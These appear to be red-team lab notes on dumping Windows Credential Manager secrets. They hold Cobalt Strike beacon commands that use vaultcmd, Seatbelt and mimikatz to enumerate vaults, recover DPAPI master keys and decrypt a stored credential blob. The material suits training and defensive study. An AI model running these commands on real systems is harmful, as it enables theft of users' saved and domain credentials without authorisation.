Windows Credential Manager uses DPAPI to store secrets in vaults. Each vault stores multiple credentials. There are two vaults in Windows:
- Web Credentials: stores browser credentials
- Windows Credentials: stores credentials saved by Windows/AD (e.g. mstsc, which is an RDP tool)
To enumerate using Cobalt Strike:
# list vaults
beacon> run vaultcmd /list # also shows credential files' location
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsVault
# list credentials in vault
beacon> run vaultcmd /listcreds:"Windows Credentials" /all
# enumerate credential files (also provides master key GUID used for encryption)
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsCredentialFilesMaster key (located in C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<SID>\<GUID>) is also encrypted.
To decrypt the master key:
# if elevated, and if the decrypted master key is cached:
beacon> mimikatz !sekurlsa::dpapi
# or request it from DC as the owner of master key:
beacon> mimikatz dpapi::masterkey /in:C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-569305411-121244042-2357301523-1104\bfc5090d-22fe-4058-8953-47f6882f549e /rpc
# ^ if impersonated, execute using @ prefix
Then decrypt the credential blob:
beacon> mimikatz dpapi::cred /in:C:\Users\bfarmer\AppData\Local\Microsoft\Credentials\6C33AC85D0C4DCEAB186B3B2E5B1AC7C /masterkey:8d15395a4bd40a61d5eb6e526c552f598a398d530ecc2f5387e07605eeab6e3b4ab440d85fc8c4368e0a7ee130761dc407a2c4d58fcd3bd3881fa4371f19c214